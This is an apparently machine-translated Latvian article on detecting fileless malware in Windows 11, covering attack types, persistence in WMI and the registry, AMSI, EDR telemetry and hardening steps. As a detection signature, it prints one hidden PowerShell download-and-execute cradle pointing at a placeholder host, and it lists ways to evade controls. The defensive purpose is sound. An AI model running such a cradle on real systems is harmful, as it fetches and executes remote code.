Kā atklāt bīstamu bezfailu ļaunprogrammatūru operētājsistēmā Windows 11

¿Kā atklāt bīstamu bezfailu ļaunprogrammatūru? Bezfailu uzbrukumu aktivitāte ir ievērojami pieaugusi, un, lai situāciju padarītu vēl sliktāku, Windows 11 nav imūnaŠī pieeja apiet disku un paļaujas uz atmiņu un likumīgiem sistēmas rīkiem; tāpēc parakstu balstītas pretvīrusu programmas nespēj nodrošināt labus rezultātus. Ja meklējat uzticamu veidu, kā to noteikt, atbilde slēpjas apvienojumā telemetrija, uzvedības analīze un Windows vadīklas.

Pašreizējā ekosistēmā kampaņas, kas ļaunprātīgi izmanto PowerShell, WMI vai Mshta, pastāv līdzās sarežģītākām metodēm, piemēram, atmiņas injekcijām, saglabāšanai "nepieskaroties" diskam un pat programmaparatūras ļaunprātīga izmantošanaSvarīgākais ir izprast apdraudējumu karti, uzbrukuma fāzes un kādus signālus tie atstāj pat tad, ja viss notiek RAM ietvaros.

Kas ir bezfailu ļaunprogrammatūra un kāpēc tā rada bažas operētājsistēmā Windows 11?

Runājot par "bezfailu" draudiem, mēs domājam ļaunprātīgu kodu, kas Jums nav nepieciešams deponēt jaunus izpildāmos failus failu sistēmā, lai tā darbotos. Parasti tā tiek ievadīta darbojošos procesos un izpildīta RAM atmiņā, paļaujoties uz interpretatoriem un binārajiem failiem, ko parakstījis Microsoft (piemēram, PowerShell, WMI, rundll32, mshtaTas samazina jūsu ietekmi un ļauj apiet dzinējus, kas meklē tikai aizdomīgus failus.

Pat biroja dokumenti vai PDF faili, kas izmanto ievainojamības komandu palaišanai, tiek uzskatīti par daļu no šīs parādības, jo aktivizēt izpildi atmiņā neatstājot analīzei noderīgus bināros failus. makro un DDE Office sistēmā, jo kods darbojas likumīgos procesos, piemēram, WinWord.

Uzbrucēji apvieno sociālo inženieriju (pikšķerēšanu, surogātpasta saites) ar tehniskiem slazdiem: lietotāja klikšķis uzsāk ķēdi, kurā skripts lejupielādē un izpilda atmiņā esošo pēdējo vērtumu, izvairoties atstāt pēdas diskā. Mērķi ir dažādi — sākot no datu zādzības līdz izspiedējvīrusu izpildei un klusai sānu kustībai.

Tipoloģijas pēc ietekmes sistēmā: no "tīras" līdz hibrīdiem

Lai izvairītos no jēdzienu sajaukšanas, ir lietderīgi atdalīt draudus pēc to mijiedarbības pakāpes ar failu sistēmu. Šī kategorizācija precizē Kas saglabājas, kur kods atrodas un kādas zīmes tas atstāj?.

I tips: nav failu aktivitāšu

Pilnīgi bez failiem ļaunprogrammatūra neko neraksta diskā. Klasisks piemērs ir ļaunprātīgas programmatūras izmantošana. tīkla ievainojamība (tāpat kā EternalBlue vektors senāk), lai ieviestu aizmugurējās durvis, kas atrodas kodola atmiņā (piemēram, DoublePulsar). Šeit viss notiek RAM atmiņā, un failu sistēmā nav artefaktu.

Vēl viena iespēja ir piesārņot programmaparatūra komponentu: BIOS/UEFI, tīkla adapteru, USB perifērijas ierīču (BadUSB tipa metodes) vai pat CPU apakšsistēmu. Tās saglabājas arī pēc restartēšanas un atkārtotas instalēšanas, radot papildu grūtības, ka Tikai daži produkti pārbauda programmaparatūruTie ir sarežģīti uzbrukumi, retāki, bet bīstami to slepenības un izturības dēļ.

II tips: netieša arhivēšanas darbība

Šeit ļaunprogrammatūra "neatstāj" savu izpildāmo failu, bet gan izmanto sistēmas pārvaldītus konteinerus, kas būtībā tiek glabāti kā faili. Piemēram, aizmugurējās durvis, kas ievieto Powershell komandas WMI repozitorijā un aktivizēt tā izpildi ar notikumu filtriem. To ir iespējams instalēt no komandrindas, neizdzēšot bināros failus, taču WMI repozitorijs atrodas diskā kā likumīga datubāze, tāpēc to ir grūti tīrīt, neietekmējot sistēmu.

No praktiskā viedokļa tie tiek uzskatīti par bezfailu, jo šis konteiners (WMI, reģistrs utt.) Tas nav klasisks nosakāms izpildāmais fails Un tā tīrīšana nav triviāla. Rezultāts: nemanāma noturība ar nelielām "tradicionālām" pēdām.

III tips: Funkcijai nepieciešami faili

Dažos gadījumos tiek saglabāts noturība bez failiem Loģiskā līmenī tiem ir nepieciešams uz failu balstīts aktivizētājs. Tipisks piemērs ir Kovter: tas reģistrē čaulas darbības vārdu nejaušam paplašinājumam; atverot failu ar šo paplašinājumu, tiek palaists neliels skripts, izmantojot mshta.exe, kas rekonstruē ļaunprātīgo virkni no reģistra.

Knifs ir tāds, ka šie "ēsmas" faili ar nejaušiem paplašinājumiem nesatur analizējamu lietderīgo slodzi, un lielākā daļa koda atrodas Ieraksts (cits konteiners). Tāpēc tie ietekmes ziņā tiek klasificēti kā bezfailu, lai gan stingri ņemot, tie ir atkarīgi no viena vai vairākiem diska artefaktiem kā aktivizētāja.

Infekcijas pārnēsātāji un “saimnieki”: kur tā iekļūst un kur slēpjas

Lai uzlabotu atklāšanu, ir svarīgi kartēt iekļūšanas punktu un infekcijas saimnieku. Šī perspektīva palīdz izstrādāt īpašas vadības ierīces Piešķiriet prioritāti atbilstošai telemetrijai.

varoņdarbi

• Uz failiem balstīts (III tips): Dokumenti, izpildāmie faili, mantoti Flash/Java faili vai LNK faili var izmantot pārlūkprogrammu vai dzinēju, kas tos apstrādā, lai ielādētu apvalka kodu atmiņā. Pirmais vektors ir fails, bet vērtums pārvietojas uz RAM.
• Tīklā balstīts (I tips): Pakotne, kas izmanto ievainojamību (piemēram, SMB), tiek izpildīta lietotāja zonā vai kodolā. WannaCry popularizēja šo pieeju. Tieša atmiņas ielāde bez jauna faila.

detaļas

• ierīces (I tips): Diska vai tīkla kartes programmaparatūru var mainīt un ieviest kodu. Grūti pārbaudīt un saglabājas ārpus operētājsistēmas.
• CPU un pārvaldības apakšsistēmas (I tips): Tādas tehnoloģijas kā Intel ME/AMT ir parādījušas veidus, kā Tīklošana un izpilde ārpus operētājsistēmasTas uzbrūk ļoti zemā līmenī ar augstu potenciālu slepenību.
• USB (I tips): BadUSB ļauj pārprogrammēt USB disku, lai tas atdarinātu tastatūru vai tīkla karti un palaistu komandas vai novirzītu datplūsmu.
• BIOS / UEFI (I tips): ļaunprātīga programmaparatūras pārprogrammēšana (piemēram, Mebromi), kas darbojas pirms Windows palaišanas.
• Hipervizors (I tips): Mini hipervizora ieviešana zem operētājsistēmas, lai slēptu tā klātbūtni. Reti sastopama, bet jau novērota hipervizora sakņu komplektu veidā.

Izpilde un injekcija

• Uz failiem balstīts (III tips): EXE/DLL/LNK vai ieplānoti uzdevumi, kas veic injekcijas likumīgos procesos.
• Makro (III tips): VBA programmā Office var atšifrēt un izpildīt vērtumus, tostarp pilnīgu izspiedējvīrusu, ar lietotāja piekrišanu, izmantojot maldināšanu.
• Skripti (II tips): PowerShell, VBScript vai JScript no faila, komandrindas, pakalpojumi, reģistrācija vai WMIUzbrucējs var ierakstīt skriptu attālinātā sesijā, nepieskaroties diskam.
• Sāknēšanas ieraksts (MBR/sāknēšana) (II tips): Tādas saimes kā Petya pārraksta sāknēšanas sektoru, lai pārņemtu kontroli startēšanas laikā. Tas atrodas ārpus failu sistēmas, bet ir pieejams operētājsistēmai un mūsdienīgiem risinājumiem, kas to var atjaunot.

Kā darbojas bezfailu uzbrukumi: fāzes un signāli

Lai gan tās neatstāj izpildāmus failus, kampaņas ievēro pakāpenisku loģiku. To izpratne ļauj veikt uzraudzību. notikumi un attiecības starp procesiem kas atstāj pēdu.

• Sākotnējā piekļuvePikšķerēšanas uzbrukumi, izmantojot saites vai pielikumus, apdraudētas tīmekļa vietnes vai nozagtas akreditācijas datus. Daudzas ķēdes sākas ar Office dokumentu, kas aktivizē komandu. PowerShell.
• Neatlaidība: aizmugurējās durvis, izmantojot WMI (filtri un abonementi), Reģistra izpildes atslēgas vai ieplānotus uzdevumus, kas atkārtoti palaiž skriptus bez jauna ļaunprātīga faila.
• EksfiltrācijaKad informācija ir apkopota, tā tiek nosūtīta no tīkla, izmantojot uzticamus procesus (pārlūkprogrammas, PowerShell, bitsadmin), lai sajauktu datplūsmu.

Šis modelis ir īpaši viltīgs, jo uzbrukuma indikatori Tie slēpjas normālā situācijā: komandrindas argumenti, procesu ķēde, anomāli izejošie savienojumi vai piekļuve injekcijas API.

Izplatītākās metodes: no atmiņas līdz ierakstīšanai

Aktieri paļaujas uz dažādiem elementiem metodes kas optimizē slepenību. Lai aktivizētu efektīvu noteikšanu, ir noderīgi zināt visbiežāk sastopamos.

• Iedzīvotājs atmiņā: Vērtīgo datu ielāde uzticama procesa telpā, kas gaida aktivizēšanu. rootkit un āķi Kodolā tie paaugstina slēpšanas līmeni.
• Noturība reģistrāSaglabājiet šifrētus blobus atslēgās un rehidratējiet tos no likumīga palaišanas programmas (mshta, rundll32, wscript). Īslaicīgā instalētāja programma var pašiznīcināties, lai samazinātu savu ietekmi.
• Akreditācijas datu pikšķerēšanaIzmantojot nozagtus lietotājvārdus un paroles, uzbrucējs izpilda attālās čaulas un ievieš klusa piekļuve reģistrā vai WMI.
• Izspiedējvīruss “bez failiem”Šifrēšana un C2 komunikācija tiek vadīta no RAM, samazinot atklāšanas iespējas, līdz bojājums kļūst redzams.
• Darbības komplekti: automatizētas ķēdes, kas pēc lietotāja klikšķa atklāj ievainojamības un izvieto tikai atmiņā esošus vērtumus.
• Dokumenti ar kodu: makro un mehānismi, piemēram, DDE, kas aktivizē komandas, nesaglabājot izpildāmos failus diskā.

Nozares pētījumi jau ir uzrādījuši ievērojamus pieaugumus: vienā 2018. gada periodā pieaugums par vairāk nekā 90% Skriptu un PowerShell ķēdes uzbrukumos tā ir zīme, ka vektors ir vēlamāks tā efektivitātes dēļ.

Uzņēmumu un piegādātāju izaicinājums: kāpēc bloķēšana vien nav pietiekama

Būtu vilinoši atspējot PowerShell vai aizliegt makro uz visiem laikiem, bet Jūs pārtrauktu operācijuPowerShell ir mūsdienu administrēšanas pīlārs, un Office ir būtisks uzņēmējdarbībā; akla bloķēšana bieži vien nav iespējama.

Turklāt ir veidi, kā apiet pamata vadīklas: PowerShell palaišana, izmantojot DLL un rundll32, skriptu iepakošana EXE failos, Paņemiet līdzi savu PowerShell kopiju vai pat paslēpt skriptus attēlos un izvilkt tos atmiņā. Tāpēc aizstāvību nevar balstīt tikai uz rīku esamības noliegšanu.

Vēl viena izplatīta kļūda ir visa lēmuma deleģēšana mākonim: ja aģentam ir jāgaida atbilde no servera, Jūs zaudējat reāllaika profilaksiTelemetrijas datus var augšupielādēt, lai bagātinātu informāciju, taču Mazināšanai jānotiek galapunktā.

Kā atklāt bezfailu ļaunprogrammatūru operētājsistēmā Windows 11: telemetrija un darbība

Uzvarošā stratēģija ir uzraudzīt procesus un atmiņuNevis faili. Ļaunprātīga uzvedība ir stabilāka nekā failu formas, tāpēc tie ir ideāli piemēroti profilakses programmām.

• AMSI (ļaunprogrammatūras apkarošanas skenēšanas saskarne)Tas pārtver PowerShell, VBScript vai JScript skriptus pat tad, ja tie ir dinamiski konstruēti atmiņā. Lieliski piemērots apmulsinātu virkņu uztveršanai pirms izpildes.
• Procesa uzraudzība: starts/finišs, PID, vecāki un bērni, maršruti, komandrindas un hešus, kā arī izpildes kokus, lai izprastu visu stāstu.
• Atmiņas analīzeInjekciju, atstarojošu vai PE slodžu noteikšana, nepieskaroties diskam, un neparastu izpildāmo apgabalu pārskatīšana.
• Startera sektora aizsardzībaMBR/EFI kontrole un atjaunošana manipulāciju gadījumā.

Microsoft ekosistēmā Defender for Endpoint apvieno AMSI, uzvedības uzraudzībaAtmiņas skenēšana un mākonī balstīta mašīnmācīšanās tiek izmantota, lai mērogotu noteikšanu pret jauniem vai apmulsinātiem variantiem. Citi pārdevēji izmanto līdzīgas pieejas ar kodola rezidentiem dzinējiem.

Reālistisks korelācijas piemērs: no dokumenta līdz PowerShell

Iedomājieties ķēdi, kurā Outlook lejupielādē pielikumu, Word atver dokumentu, tiek iespējots aktīvais saturs un PowerShell tiek palaists ar aizdomīgiem parametriem. Pareiza telemetrija parādītu Komandrinda (piemēram, ExecutionPolicy apiešana, slēpts logs), savienojuma izveide ar neuzticamu domēnu un bērnprocesa izveide, kas instalējas AppData.

Aģents ar lokālu kontekstu spēj apstāties un atgriezties atpakaļ ļaunprātīgu darbību bez manuālas iejaukšanās, papildus paziņojot SIEM sistēmai vai izmantojot e-pastu/ĪSZIŅU. Daži produkti pievieno pamatcēloņa attiecināšanas slāni (StoryLine tipa modeļi), kas norāda nevis uz redzamo procesu (Outlook/Word), bet gan uz pilnībā ļaunprātīgs pavediens un tās izcelsmi, lai visaptveroši attīrītu sistēmu.

Tipisks komandu modelis, kam jāpievērš uzmanība, varētu izskatīties šādi: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden (New-Object Net.WebClient).DownloadString('http//dominiotld/payload');Loģika nav precīza virkne, bet gan signālu kopums: politikas apiešana, slēpts logs, lejupielādes tīrīšana un izpilde atmiņā.

AMSI, cauruļvads un katra dalībnieka loma: no galapunkta līdz SOC

Papildus skriptu uztveršanai stabila arhitektūra organizē darbības, kas atvieglo izpēti un reaģēšanu. Jo vairāk pierādījumu pirms slodzes izpildes, jo labāk., labāk.

• Skripta pārtveršanaAMSI piegādā saturu (pat ja tas tiek ģenerēts darbības laikā) statiskai un dinamiskai analīzei ļaunprogrammatūras plūsmas ietvaros.
• Procesa notikumiTiek apkopoti PID, binārie faili, heši, maršruti un citi dati. argumenti, izveidojot procesu kokus, kas noveda pie galīgās ielādes.
• Atklāšana un ziņošanaNoteiktie dati tiek parādīti produkta konsolē un pārsūtīti uz tīkla platformām (NDR) kampaņas vizualizācijai.
• Lietotāja garantijasPat ja skripts tiek ievadīts atmiņā, ietvars AMSI to pārtver saderīgās Windows versijās.
• Administratora iespējas: politikas konfigurācija, lai iespējotu skriptu pārbaudi, uz uzvedību balstīta bloķēšana un atskaišu veidošana no konsoles.
• SOC darbsartefaktu (VM UUID, OS versija, skripta tips, iniciatora process un tā vecākprocess, jaucējkodas un komandrindas) ieguve, lai atjaunotu vēsturi un lifta noteikumi nākotnē.

Kad platforma ļauj eksportēt atmiņas buferis Saistībā ar izpildi pētnieki var ģenerēt jaunus atklājumus un bagātināt aizsardzību pret līdzīgiem variantiem.

Praktiski pasākumi operētājsistēmā Windows 11: profilakse un medības

Papildus EDR ar atmiņas pārbaudi un AMSI, Windows 11 ļauj slēgt uzbrukuma zonas un uzlabot redzamību ar vietējās vadības ierīces.

• Reģistrācija un ierobežojumi pakalpojumā PowerShellIespējo skriptu bloku reģistrēšanu un moduļu reģistrēšanu, iespēju robežās lieto ierobežotos režīmus un kontrolē to izmantošanu. Apvedceļš/Slēpts.
• Uzbrukuma virsmas samazināšanas (ASR) noteikumi: bloķē Office procesu skriptu palaišanu un WMI ļaunprātīga izmantošana/PSExec, kad tas nav nepieciešams.
• Office makro politikas: pēc noklusējuma atspējo iekšējo makro parakstīšanu un stingros uzticamības sarakstus; uzrauga mantotās DDE plūsmas.
• WMI audits un reģistrs: uzrauga notikumu abonementus un automātiskās izpildes atslēgas (Run, RunOnce, Winlogon), kā arī uzdevumu izveidi ieplānots.
• Ieslēgšanas aizsardzība: aktivizē drošo sāknēšanu, pārbauda MBR/EFI integritāti un apstiprina, ka startēšanas laikā nav veiktas nekādas izmaiņas.
• Lāpīšana un sacietēšana: novērš izmantojamās ievainojamības pārlūkprogrammās, Office komponentos un tīkla pakalpojumos.
• Apzināšanās: apmāca lietotājus un tehniskās komandas pikšķerēšanas un signālu apiešanā slepenas nāvessoda izpildes.

Meklējot, koncentrējieties uz vaicājumiem par: Office procesu izveidi PowerShell/MSHTA virzienā, argumentiem ar lejupielādes virkne/lejupielādes failsSkripti ar skaidru obfukāciju, atstarojošām injekcijām un izejošajiem tīkliem uz aizdomīgiem augstākā līmeņa domēniem. Salīdziniet šos signālus ar reputāciju un biežumu, lai samazinātu troksni.

Ko katrs dzinējs mūsdienās var noteikt?

Microsoft uzņēmumu risinājumi apvieno AMSI, uzvedības analīzi, pārbaudīt atmiņu un sāknēšanas sektora aizsardzību, kā arī mākonī balstītus mašīnmācīšanās modeļus, lai cīnītos pret jauniem draudiem. Citi pārdevēji ievieš kodola līmeņa uzraudzību, lai atšķirtu ļaunprātīgu programmatūru no nekaitīgas, automātiski atceļot izmaiņas.

Pieeja, kuras pamatā ir nāvessoda stāsti Tas ļauj identificēt pamatcēloni (piemēram, Outlook pielikumu, kas aktivizē ķēdi) un mazināt visu koku: skriptus, atslēgas, uzdevumus un starpposma bināros failus, izvairoties no iestrēgšanas pie redzamā simptoma.

Biežākās kļūdas un kā no tām izvairīties

PowerShell bloķēšana bez alternatīva pārvaldības plāna ir ne tikai nepraktiska, bet pastāv arī šādas problēmas: veidi, kā to netieši izraisītTas pats attiecas uz makro: vai nu jūs tos pārvaldāt ar politikām un parakstiem, vai arī cietīs uzņēmums. Labāk ir koncentrēties uz telemetriju un uzvedības noteikumiem.

Vēl viena izplatīta kļūda ir uzskats, ka lietojumprogrammu iekļaušana baltajā sarakstā atrisina visu: bezfailu tehnoloģija balstās tieši uz to. uzticamas lietotnesKontrolei jānovēro, ko viņi dara un kā viņi ir saistīti, nevis tikai tas, vai viņiem ir atļauts.

Ņemot vērā visu iepriekš minēto, bezfailu ļaunprogrammatūra pārstāj būt "spoks", ja uzraugat to, kas patiešām ir svarīgs: uzvedība, atmiņa un izcelsme katras izpildes. Apvienojot AMSI, bagātīgu procesu telemetriju, vietējās Windows 11 vadīklas un EDR slāni ar uzvedības analīzi, jūs iegūstat priekšrocības. Pievienojiet vienādojumam reālistiskas makro un PowerShell politikas, WMI/reģistra auditu un medības, kas piešķir prioritāti komandrindām un procesu kokiem, un jums ir aizsardzība, kas pārtrauc šīs ķēdes, pirms tās rada troksni.